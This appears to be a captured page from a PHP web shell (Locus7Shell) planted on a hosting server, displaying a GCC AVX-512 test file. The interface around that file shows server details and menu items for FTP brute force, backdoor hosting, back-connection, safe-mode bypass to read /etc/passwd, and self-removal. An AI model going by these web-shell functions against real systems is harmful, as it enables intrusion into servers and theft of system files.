Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     avx512dq-vreducess-2.c (1.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */
/* { dg-options "-O2 -mavx512dq" } */
/* { dg-require-effective-target avx512dq } */

#define AVX512DQ
#include "avx512f-helper.h"
#include <string.h>

#define SIZE (AVX512F_LEN / 64)
#include "avx512f-mask-type.h"

#define IMM 0x23

void
CALC (float *r, float *s)
{
  int i;

  memcpy (&r[1], &s[1], 2 * sizeof(float));

  for (i = 0; i < 2; i++)
    {
      float tmp = (int) (4 * s[i]) / 4.0;
      r[i] = s[i] - tmp;
    }
}

void
TEST (void)
{
  printf("\nsize = %d\n\n", SIZE);

  union128 res1, res2, res3, res4, res5, res6;
  union128 s1, s2, src;
  float res_ref[4];
  MASK_TYPE mask = MASK_VALUE;
  int j;

  for (j = 0; j < 4; j++)
    {
      s1.a[j] = j / 123.456;
      s2.a[j] = j / 123.456;
      res_ref[j] = j / 123.456;
      res1.a[j] = DEFAULT_VALUE;
      res2.a[j] = DEFAULT_VALUE;
      res3.a[j] = DEFAULT_VALUE;
      res4.a[j] = DEFAULT_VALUE;
      res5.a[j] = DEFAULT_VALUE;
      res6.a[j] = DEFAULT_VALUE;
    }

  res1.x = _mm_reduce_ss (s1.x, s2.x, IMM);
  res2.x = _mm_mask_reduce_ss (s1.x, mask, s1.x, s2.x, IMM);
  res3.x = _mm_maskz_reduce_ss (mask, s1.x, s2.x, IMM);
  res4.x = _mm_reduce_round_ss (s1.x, s2.x, IMM, _MM_FROUND_TO_NEAREST_INT
                | _MM_FROUND_NO_EXC);
  res5.x = _mm_mask_reduce_round_ss (s1.x, mask, s1.x, s2.x,
                     IMM, _MM_FROUND_TO_NEAREST_INT
                     | _MM_FROUND_NO_EXC);
  res6.x = _mm_maskz_reduce_round_ss (mask, s1.x, s2.x, IMM,
                      _MM_FROUND_TO_NEAREST_INT
                      | _MM_FROUND_NO_EXC);

  CALC (res_ref, s2.a);

  if (check_union128 (res1, res_ref))
    abort ();
 
  if (check_union128 (res4, res_ref))
    abort ();
 
  MASK_MERGE () (res_ref, mask, 1);

  if (check_union128 (res2, res_ref))
    abort ();

  if (check_union128 (res5, res_ref))
    abort ();

  MASK_ZERO () (res_ref, mask, 1);

  if (check_union128 (res3, res_ref))
    abort ();

  if (check_union128 (res6, res_ref))
    abort ();

}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0066 ]--